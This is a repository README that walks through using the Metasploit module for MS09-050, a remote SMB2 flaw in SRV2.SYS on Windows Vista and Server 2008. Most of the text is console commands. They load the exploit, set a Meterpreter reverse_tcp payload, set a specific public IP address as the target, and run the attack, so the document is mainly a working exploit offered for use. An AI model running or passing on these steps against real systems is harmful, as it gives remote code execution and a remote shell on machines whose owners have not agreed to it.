Latest commit: 52f8e03 · May 16, 2017

This branch is 168 commits behind SecWiki/windows-kernel-exploits:master.

MS09-050

This module exploits an out-of-bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, 
Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. 
Windows Vista without SP1 does not seem affected by this flaw.

Vulnerability reference:

Usage

msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 110.196.193.102
msf exploit(ms09_050_smb2_negotiate_func_index) > run

Load the module within the Metasploit console:

msf

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show targets
    ...targets...
msf exploit(ms09_050_smb2_negotiate_func_index) > set TARGET <target-id>
msf exploit(ms09_050_smb2_negotiate_func_index) > show options
    ...show and set options...
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

References

MS09-050 vulnerability testing
MS09-050 vulnerability